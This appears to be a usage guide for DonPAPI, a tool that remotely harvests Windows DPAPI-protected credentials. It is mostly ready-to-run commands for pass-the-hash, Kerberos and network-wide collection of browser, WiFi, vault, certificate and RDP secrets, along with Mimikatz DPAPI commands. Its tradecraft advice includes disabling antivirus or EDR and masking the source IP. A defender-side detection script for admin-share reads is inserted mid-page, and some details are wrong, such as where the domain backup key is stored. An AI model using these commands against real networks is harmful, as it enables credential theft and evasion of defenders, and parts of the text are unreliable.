DonPAPI
DonPAPI is a post-exploitation framework for remotely harvesting Windows credentials and secrets via DPAPI without touching LSASS. It extracts browser passwords, WiFi keys, vault credentials, and certificates from target machines over the network.
Installation
Install from PyPI:
pip install donpapi
Install from source:
git clone https://github.com/login-securite/DonPAPI.git
cd DonPAPI
pip install -r requirements.txt
python donpapi.py --help
Requires Python 3.8+, Impacket, and Windows domain credentials for remote access.
Quick Start
Basic usage with password authentication:
donpapi -d DOMAIN -u USERNAME -p PASSWORD 192.168.1.100
Single IP with domain admin account:
donpapi -d contoso.com -u admin -p 'P@ssw0rd!' 10.0.0.50
Against multiple targets:
donpapi -d domain.com -u user -p pass 10.0.0.0/24
Authentication Methods
Password Authentication
donpapi -d DOMAIN -u USERNAME -p PASSWORD TARGET
donpapi -d corp -u jdoe -p 'MyPassword123!' 192.168.1.100
NTLM Hash (Pass-the-Hash)
donpapi -d DOMAIN -u USERNAME -H NTHASH TARGET
donpapi -d corp -u admin -H 8846f7eaee8fb117ad06bdd830b7586c 10.0.0.50
Kerberos Authentication
donpapi -d DOMAIN -u USERNAME -k TARGET
export KRB5CCNAME=/tmp/user.ccache
donpapi -d corp -u jdoe -k 192.168.1.100
AES Key Authentication
donpapi -d DOMAIN -u USERNAME -aesKey AESKEY TARGET
donpapi -d corp -u user -aesKey abc123def456... 10.0.0.100
Current Session (LUID/Session Token)
donpapi -luid TOKEN TARGET
donpapi -luid 0x12345:0x6789abc 192.168.1.100
Target Specification
Single IP Address
donpapi -d domain.com -u admin -p pass 192.168.1.100
CIDR Range
donpapi -d domain.com -u admin -p pass 192.168.1.0/24
donpapi -d domain.com -u admin -p pass 10.0.0.0/16
Targets from File
donpapi -d domain.com -u admin -p pass -tf targets.txt
targets.txt format (one per line):
192.168.1.100
192.168.1.101
192.168.1.102
10.0.0.50
Target IP Override
donpapi -d domain.com -u admin -p pass --target-ip 192.168.1.100 hostname
What It Collects
Browser Credentials
Extracts cached passwords and stored credentials from:
- Chrome/Chromium passwords and saved autofill
- Microsoft Edge passwords and autofill
- Firefox passwords (if encrypted with DPAPI)
- Opera, Brave, and other Chromium-based browsers
| Browser | Passwords | Cookies | Autofill | Bookmarks |
|---|---|---|---|---|
| Chrome | Yes | Yes | Yes | No |
| Edge | Yes | Yes | Yes | No |
| Firefox | Yes | No | No | No |
| Opera | Yes | Yes | Yes | No |
| Brave | Yes | Yes | Yes | No |
WiFi Passwords
Recovers stored wireless network credentials:
- All SSID names and pre-shared keys (PSK)
- Connection profiles with DPAPI encryption
- Requires domain backup key for decryption
Windows Vault Credentials
Extracts stored credentials from Windows Credential Manager:
- Generic credentials (username/password pairs)
- Domain credentials
- Certificate-based credentials
- Session cookies
Certificate Data
Harvests certificate-related secrets:
- Private keys
- Client certificates
- Server certificates
- Certificate thumbprints
RDP Connection History
Retrieves Remote Desktop credentials:
- Saved RDP connection passwords
- Connection metadata
- Server information
Scheduled Task Credentials
Extracts credentials from scheduled tasks:
- Task-embedded usernames and passwords
- Run-as credentials
- Service account details
Collection Methods
Registry Access Over SMB
- HKEY_CURRENT_USER registry hives, read remotely
- HKEY_LOCAL_MACHINE sensitive locations
- No local execution required
- SAM/SECURITY/SYSTEM hives for hash extraction
Protected File Retrieval
- Copies protected files via SMB
- Browser database files
- Vault credential stores
- DPAPI-protected files
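The two collection methods above leave a file-share footprint: masterkey files, browser databases and vault stores are read through the C$ / ADMIN$ admin shares, which Windows records as Security event 5145 when share auditing is enabled. The following defender-side example is added here and is not part of DonPAPI or this page; it parses constructed 5145 records rendered as key=value lines (a format assumed for the example) and flags a source IP that reads two or more distinct DPAPI-protected artifact types. The two Protect paths are the masterkey locations named on this page; the Chromium "Login Data" and Credential Manager vault paths are the well-known Windows defaults.

```python
import re
from collections import defaultdict

# Share-relative paths, matched case-insensitively, that a DPAPI harvester reads
# over the C$ / ADMIN$ admin shares. Protect paths are from the page; the
# browser and vault paths are the standard Windows locations.
SENSITIVE_PATHS = {
    "dpapi_user_masterkey": re.compile(r"users\\[^\\]+\\appdata\\roaming\\microsoft\\protect\\s-1-5-21-", re.I),
    "dpapi_system_masterkey": re.compile(r"system32\\microsoft\\protect\\s-1-5-18\\", re.I),
    "browser_login_db": re.compile(r"\\user data\\[^\\]+\\login data$", re.I),
    "windows_vault": re.compile(r"appdata\\local\\microsoft\\vault\\", re.I),
}

# Constructed sample events (not real log data) in a flattened key=value
# rendering of Security event 5145; the GUIDs are placeholders.
SAMPLE_EVENTS = [
    r'EventID=5145 IpAddress=10.0.0.77 ShareName=\\*\C$ RelativeTargetName="Users\jdoe\AppData\Roaming\Microsoft\Protect\S-1-5-21-1111-2222-3333-1001\0d2ea3c1-0000-4000-8000-000000000001"',
    r'EventID=5145 IpAddress=10.0.0.77 ShareName=\\*\C$ RelativeTargetName="Users\jdoe\AppData\Local\Google\Chrome\User Data\Default\Login Data"',
    r'EventID=5145 IpAddress=10.0.0.77 ShareName=\\*\C$ RelativeTargetName="Users\jdoe\AppData\Local\Microsoft\Vault\00000000-0000-4000-8000-00000000000a\Policy.vpol"',
    r'EventID=5145 IpAddress=10.0.0.9 ShareName=\\*\ADMIN$ RelativeTargetName="System32\Microsoft\Protect\S-1-5-18\User\0d2ea3c1-0000-4000-8000-000000000002"',
    r'EventID=5145 IpAddress=10.0.0.5 ShareName=\\*\C$ RelativeTargetName="Users\jdoe\Documents\report.docx"',
    r'EventID=4624 IpAddress=10.0.0.77 LogonType=3',
]

FIELD = re.compile(r'(\w+)=("[^"]*"|\S+)')

def parse_event(line):
    """Parse one flattened event line into a dict of field -> value."""
    return {k: v.strip('"') for k, v in FIELD.findall(line)}

def classify(event):
    """Return the artifact category a 5145 admin-share read touches, or None."""
    if event.get("EventID") != "5145":
        return None
    if not event.get("ShareName", "").lower().endswith(("\\c$", "\\admin$")):
        return None
    target = event.get("RelativeTargetName", "")
    for category, pattern in SENSITIVE_PATHS.items():
        if pattern.search(target):
            return category
    return None

def detect(lines, min_categories=2):
    """Group hits by source IP; flag sources reading >= min_categories artifact types."""
    hits = defaultdict(set)
    for line in lines:
        ev = parse_event(line)
        cat = classify(ev)
        if cat:
            hits[ev.get("IpAddress", "?")].add(cat)
    return {ip: sorted(cats) for ip, cats in hits.items() if len(cats) >= min_categories}

if __name__ == "__main__":
    for ip, cats in detect(SAMPLE_EVENTS).items():
        print(f"ALERT {ip}: {', '.join(cats)}")
```

A single masterkey read can be legitimate backup activity, which is why the default threshold requires several artifact types from one source; lower `min_categories` to 1 to surface every touch of the SYSTEM masterkey directory.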
Stealthy vs. Mimikatz
DonPAPI advantages over Mimikatz:
- No LSASS memory access required
- No code injection needed
- No process creation on target
- Remote execution only
- No antivirus hooks on LSASS
- Recoverable from disk artifacts
- Minimal memory footprint
Output and Reporting
Specify Output Directory
donpapi -d domain.com -u admin -p pass -o /tmp/output 192.168.1.100
Output Structure
output/
├── 192.168.1.100/
│ ├── Browser Credentials/
│ │ ├── chrome_passwords.txt
│ │ ├── edge_passwords.txt
│ │ └── firefox_logins.json
│ ├── Wifi/
│ │ └── wifi_passwords.txt
│ ├── Windows Vault/
│ │ └── vault_credentials.txt
│ ├── Windows Certificates/
│ │ └── certificates.pem
│ ├── RDP/
│ │ └── rdp_credentials.txt
│ └── report.html
HTML Report
Automatically generated summary:
- Visual dashboard of recovered credentials
- Target overview and collection summary
- Credentials grouped by type
- Timeline of collection
- Export-ready formats
Database Export
- SQLite database with all findings
- Searchable credential repository
- Machine-readable format
- Integration with credential managers
Filtering Options
Exclude Browser Credentials
donpapi -d domain.com -u admin -p pass --no-browser 192.168.1.100
Exclude VNC Credentials
donpapi -d domain.com -u admin -p pass --no-vnc 192.168.1.100
Exclude WiFi Passwords
donpapi -d domain.com -u admin -p pass --no-wifi 192.168.1.100
Exclude Sysadmin Accounts
donpapi -d domain.com -u admin -p pass --no-sysadmins 192.168.1.100
Selective Collection
donpapi -d domain.com -u admin -p pass --filter browsers,wifi,vault 192.168.1.100
donpapi -d domain.com -u admin -p pass --filter certificates,rdp 192.168.1.100
Combined Filtering
donpapi -d domain.com -u admin -p pass --no-browser --no-vnc --filter vault,wifi 10.0.0.0/24
DPAPI Explained
Windows DPAPI Overview
DPAPI (Data Protection API) is Windows' built-in encryption mechanism:
- User-level keys: encrypted with the user's password
- Machine-level keys: encrypted with SYSTEM
- Domain backup key: allows domain admin decryption
- Master keys stored in the user's profile
DPAPI Master Keys
Location and structure:
- User keys: C:\Users\USERNAME\AppData\Roaming\Microsoft\Protect\{SID}
- System keys: C:\Windows\System32\Microsoft\Protect\S-1-5-18
- Multiple master keys per user (created periodically)
- Protected by the user's logon password
Domain Backup Key Recovery
- Domain admins can extract the domain backup key
- Allows decryption of all domain user DPAPI secrets
- Stored in AD (msDS-KeyCredentialLink, etc.)
- Enables offline credential recovery
Advanced Options
Provide Domain Backup Key
donpapi -d domain.com -u admin -p pass --pvk domain_backup.pvk 192.168.1.100
Specify Domain Controller IP
donpapi -d domain.com -u admin -p pass --dc-ip 10.0.0.10 192.168.1.100
Custom Target IP
donpapi -d domain.com -u admin -p pass --target-ip 10.0.0.100 WORKSTATION01
Port Specification
donpapi -d domain.com -u admin -p pass -ports 445,3389 192.168.1.100
donpapi -d domain.com -u admin -p pass --port 445 192.168.1.0/24
Multithreaded Collection
donpapi -d domain.com -u admin -p pass --threads 10 192.168.1.0/24
Verbose Logging
donpapi -d domain.com -u admin -p pass -v 192.168.1.100
donpapi -d domain.com -u admin -p pass -vv 192.168.1.100
Troubleshooting
Connection Refused
Check network connectivity and firewall:
- Verify SMB port 445 is open
- Confirm credentials are valid
- Check firewall rules on the target
- Ensure the target is reachable
Access Denied
Verify authentication credentials:
- Confirm username and password
- Check that the user has administrative rights
- Verify the domain name is correct
- Test with a different credential type (hash vs. password)
No Credentials Found
The target may have few secrets stored:
- The user may not have browser passwords saved
- WiFi passwords are only stored for the currently connected network
- Check that --no-* filters aren't excluding data
- Verify the user has logged in and cached credentials
DPAPI Decryption Fails
Decryption is not possible without the proper keys:
- Domain backup key not available
- User password not correct
- DPAPI masterkey file corrupted
- Try with a domain admin account for better access
SMB Enumeration Timeout
Increase the timeout for slow networks:
donpapi -d domain.com -u admin -p pass --timeout 30 192.168.1.100
Best Practices
Operational Security
- Use a domain admin or compromised admin account
- Filter unnecessary data collections (--no-browser if not needed)
- Disable antivirus/EDR temporarily if possible
- Run against specific targets, not blind scans
- Clean up output files after collection
- Use VPN/proxy to mask source IP
Collection Strategy
- Target high-value systems first (servers, admin workstations)
- Prioritize domain controllers for backup key extraction
- Focus on service accounts with stored credentials
- Combine with credential validation tools
- Document all collected credentials safely
Credential Validation
After collection, validate credentials:
- Test RDP credentials against the target
- Verify domain account access
- Check WiFi connectivity
- Authenticate to discovered systems
- Prioritize credentials by privilege level
Safe Storage
Protect harvested credentials:
- Store the output directory on an encrypted volume
- Restrict access to findings
- Use a separate reporting machine
- Archive securely for cleanup
- Document chain of custody
Related Tools
Mimikatz DPAPI Modules
Extract DPAPI secrets with Mimikatz:
mimikatz.exe "dpapi::cred /in:C:\Users\user\AppData\Roaming\..."
mimikatz.exe "dpapi::masterkey /in:masterkey_file"
mimikatz.exe "dpapi::cache" # List cached DPAPI data
SharpDPAPI
C# DPAPI extraction tool:
- Windows-native DPAPI exploitation
- Chromium-based browser password extraction
- Vault credential recovery
- RDP connection harvesting
Impacket dpapi.py
Python DPAPI utilities:
- Masterkey file parsing
- DPAPI secret decryption
- Domain backup key operations
- Cryptographic key extraction
LaZagne
Multi-platform credential recovery:
- Browser password extraction
- VPN credential harvesting
- Mail client password recovery
- SSH key enumeration
Other Credential Tools
| Tool | Purpose | Stealth |
|---|---|---|
| Mimikatz | In-memory credential dumping | Low |
| procdump + pypykatz | Indirect LSASS dumping | Medium |
| Nirsoft tools | Cached credential recovery | Medium |
| SafetyKatz | Obfuscated Mimikatz variant | Medium |
| Credentials.ps1 | PowerShell credential module | High |